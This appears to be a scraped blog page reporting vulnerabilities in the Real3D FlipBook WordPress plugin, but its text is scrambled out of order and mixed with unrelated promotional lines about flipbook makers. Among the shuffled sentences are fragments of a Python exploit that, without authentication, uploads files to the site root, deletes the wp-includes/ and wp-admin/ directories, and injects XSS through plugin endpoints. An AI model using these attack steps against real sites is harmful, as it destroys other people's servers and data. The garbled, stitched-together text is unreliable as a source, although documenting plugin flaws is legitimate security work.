![]() or \n ')Īfter executing this exploit, the wordpress site doesn’t load because the exploit deletes all the files in wp-includes/. Print(tabs + '* Multiple Vulnerabilities Found by: *') Print(tabs + '* CodeCanyon Real3D FlipBook WordPress Plugin *') Os.system('cls' if os.name = 'nt' else 'clear') Print(' ' + self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php?action=' + self.payload3 + '&bookId=' + self.payload3) R = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php', self.payload3) Print(' Image has been uploaded here ' + self.url + '/' + self.payload2 + '.jpg') You can also choose to add engaging elements such as audio, video, external link, and more. The flipbook converter will create an interactive flipbook for you to download. R = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload2, True) To turn a PDF into a flip book, use an online flipbook maker app and just upload your PDF. Print(' Uploading image file in target root directory') Print(' Files have been deleted successfully')ĮncodedImage = base64.b64encode(r.content) Anyone can free download the software to create attractive mobile content for readers. It can help to create an interactive, rich, and engaging mobile experience without writing one line of code. R = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload1, True) Mobissue is PDF flip book maker exclusive designed for mobile users. Print(' Deleting Files from wp-includes/ & wp-admin/') This vulnerability exists in a file wp-content/plugins/real3d-flipbook/includes/process.php. Delete Files or Directories (Unauthenticated) Let's take a look at these vulnerabilities individually. Cross Site Scripting (XSS) vulnerability.Upload images in Root directory (Unauthenticated).Delete any file or directory from the server (Unauthenticated).While auditing this plugin, I found some critical vulnerabilities which can be exploited by an unauthenticated user and do some real damage to our wordpress installation. We usually audit the code and add some tweaks first. We don't install the plugins directly on our wordpress instance. The company I work for, bought this plugin few days ago and decided to use it on our wordpress blog for the company featured magazine. You can find further details on the official codecanyon page. ![]() At the time of writing this post, the plugin costs $32 with $9.60 for extended 12 months support. We can upload PDF files or JPEG images and it will automatically make an interactive flipbook for wordpress posts and pages. social share – facebook, twitter, google plus.Real 3D Flipbook is a wordpress plugin which uses Web Graphics Library to create 3D flip books.customizable menu – use only icons that you need.retina friendly icons – icon font used for menu icons, fully customizable – change color, size, add drop shadow ect.real fullscreen support – if fullscreen is not supported by the browser, the icon will not be shown in the menu, if fullscreen is supported it will expand the book in real full screen mode, not browser full screen.advanced zooming support with mouse wheel zoom on desktop, pinch zoom on mobile, scrollbars when zoomed, touch swipe, click and drag.choose between 3 types of flip animation – webgl realistic 3d, jquery 2d or CSS3 3d flip animation customizable animation speed and transition type.smart page loading – only current pages are loaded.optimized for mobile – look and feel of a native app on mobile with touch swipe, pinch zoom etc.responsive design – book resizes so it fits screen width or screen height depending on the layout, thumbnails are placed horizontally or vertically depending on the layout.real 3d – lights, shadows, page bending.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |